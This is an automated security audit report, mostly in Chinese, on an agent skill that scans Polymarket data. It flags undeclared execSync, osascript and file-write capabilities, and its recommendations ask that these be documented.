安全决策报告
polymarket-opportunities-scanning
Skill declares only network:READ via public API, but actual code uses shell:WRITE (execSync/osascript) and filesystem:WRITE without disclosure in documentation.
最直接的威胁证据
高危 文档欺骗
Shell execution undeclared in SKILL.md SKILL.md states 'No external API keys required' and implies only network:READ via public fetch. However, send-report.js uses execSync to spawn shell processes and osascript for AppleScript execution — shell:WRITE capability not disclosed.
scripts/send-report.js:47 为什么得出这个结论
2/4 个维度触发 阻止
声明与实际能力
发现 3 项声明之外的能力或越权行为。
复核
隐藏执行与外联
提取到 3 个一般风险产物,需要结合上下文判断。
阻止
攻击链与高危发现
报告包含 0 步攻击链,另有 2 项高危或严重发现。
复核
依赖与供应链卫生
没有完整依赖信息,供应链判断需要保留弹性。
风险分是怎么被拉高的
Undeclared shell execution via execSync +20
SKILL.md claims no external deps, only network:READ, but send-report.js uses execSync to run node commands
Undeclared osascript execution +15
AppleScript execution via osascript not declared — allows arbitrary macOS command execution
Undeclared filesystem:WRITE +10
Writes opportunities.json without declaration in SKILL.md
最关键的证据
高危 文档欺骗
Shell execution undeclared in SKILL.md
SKILL.md states 'No external API keys required' and implies only network:READ via public fetch. However, send-report.js uses execSync to spawn shell processes and osascript for AppleScript execution — shell:WRITE capability not disclosed.
scripts/send-report.js:47 Declare shell:WRITE in SKILL.md capabilities section if shell execution is necessary. Document what commands are executed.
高危 文档欺骗
osascript/AppleScript execution undeclared
Email delivery via osascript is not mentioned in SKILL.md. This allows arbitrary macOS command execution through AppleScript, a significant attack vector if the .env is compromised or the script is modified.
scripts/send-report.js:55 Document osascript usage or switch to a documented email library (nodemailer, sendgrid) if possible.
中危 文档欺骗
Filesystem write access not declared
SKILL.md does not mention that scanner.js writes opportunities.json to disk. While legitimate for the use case, this filesystem:WRITE capability should be declared.
scripts/scanner.js:217 Declare filesystem:WRITE in SKILL.md capabilities section.
中危 文档欺骗
.env loading not documented
send-report.js loads configuration from .env file but this behavior is not mentioned in SKILL.md setup instructions (only references/setup.md).
scripts/send-report.js:15 Document .env file usage in SKILL.md setup section.
声明能力 vs 实际能力
网络访问 通过
声明 READ
→ 推断 READ
scanner.js:13 fetches gamma-api.polymarket.com 命令执行 阻止
声明 NONE
→ 推断 WRITE
send-report.js:47 execSync, send-report.js:55 osascript 文件系统 阻止
声明 NONE
→ 推断 WRITE
scanner.js:217 fs.writeFileSync 环境变量 阻止
声明 NONE
→ 推断 READ
send-report.js:15-24 .env loading 可疑产物与外联
中危 外部 URL
https://polymarket.com/event/... SKILL.md:65
中危 外部 URL
https://gamma-api.polymarket.com scripts/scanner.js:12
中危 外部 URL
https://polymarket.com/event/$ scripts/scanner.js:151
依赖与供应链
没有结构化依赖告警。
文件构成
4 个文件 · 551 行
JavaScript 2 个文件 · 372 行Markdown 2 个文件 · 179 行
需关注文件 · 3
scripts/scanner.js Filesystem write access not declared · https://gamma-api.polymarket.com · https://polymarket.com/event/$
scripts/send-report.js Shell execution undeclared in SKILL.md · osascript/AppleScript execution undeclared · .env loading not documented
SKILL.md https://polymarket.com/event/...
其他文件 · setup.md
安全亮点
Uses native fetch API, no external dependencies with known vulnerabilities
No hardcoded credentials or API keys in source code
No base64 obfuscation or suspicious encoding patterns
Legitimate financial data analysis use case with plausible business justification
Output file (opportunities.json) is local and not exfiltrated